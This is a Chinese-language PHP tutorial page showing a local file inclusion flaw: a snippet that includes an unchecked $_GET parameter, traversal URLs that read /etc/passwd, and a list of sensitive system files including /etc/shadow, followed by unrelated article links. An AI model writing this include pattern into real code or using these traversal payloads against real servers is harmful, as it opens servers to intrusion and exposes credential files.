php 偽造本地文件包含漏洞的代碼

更新時間：2011年11月03日 23:33:36 作者：

php 偽造本地文件包含漏洞的代碼,大家一定要注意防范。

代碼:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以這樣使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

獲取更多數(shù)據(jù):
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

來自hackteach

您可能感興趣的文章:

包含漏洞

php ActiveMQ的安裝與使用方法圖文教程
這篇文章主要介紹了php ActiveMQ的安裝與使用方法,結合圖文與實例形式分析了ActiveMQ的功能、安裝、使用方法及操作注意事項,需要的朋友可以參考下
2020-02-02
解析php擴展php_curl.dll不加載的解決方法
本篇文章是對php擴展php_curl.dll不加載的解決方法進行了詳細的分析介紹，需要的朋友參考下
2013-06-06
PHP生成制作驗證碼的簡單實例
下面小編就為大家?guī)硪黄狿HP生成制作驗證碼的簡單實例。小編覺得挺不錯的，現(xiàn)在就分享給大家，也給大家做個參考。一起跟隨小編過來看看吧
2016-06-06
php5.3后靜態(tài)綁定用法詳解
這篇文章主要介紹了php5.3后靜態(tài)綁定用法,結合具體示例分析了php5.3開始引入的后靜態(tài)綁定相關概念、功能、使用方法與注意事項,并搜集了來自網(wǎng)友的典型分析說明,需要的朋友可以參考下
2016-11-11
淺談PHP的exec()函數(shù)無返回值排查方法(必看)
下面小編就為大家?guī)硪黄獪\談PHP的exec()函數(shù)無返回值排查方法(必看)。小編覺得挺不錯的，現(xiàn)在就分享給大家，也給大家做個參考。一起跟隨小編過來看看吧
2017-03-03
php復制文件后改名的實例代碼
在本篇文章里小編給大家整理的是一篇關于php復制文件后改名的方法及相關內容，有興趣的朋友們可以學習下。
2021-09-09
PHP將整數(shù)數(shù)字轉換為羅馬數(shù)字實例分享
本篇文章中小編給大家分享了一篇關于PHP將整數(shù)數(shù)字轉換為羅馬數(shù)字的知識點以及實例內容，需要的朋友們學習下。
2019-03-03
PHP中使用mktime獲取時間戳的一個黑色幽默分析
mktime(hour,minute,second,month,day,year,is_dst)這是mktime的語法說明，一目了然應該不難寫出一個時間戳的代碼來
2012-05-05
php中explode與split的區(qū)別介紹
今天在使用split時遇到一些問題。還是對函數(shù)理解不深刻，特寫出來做個記號
2012-10-10
php 刪除一維數(shù)組中某一個值元素的操作方法
下面小編就為大家分享一篇php 刪除一維數(shù)組中某一個值元素的操作方法，具有很好的參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2018-02-02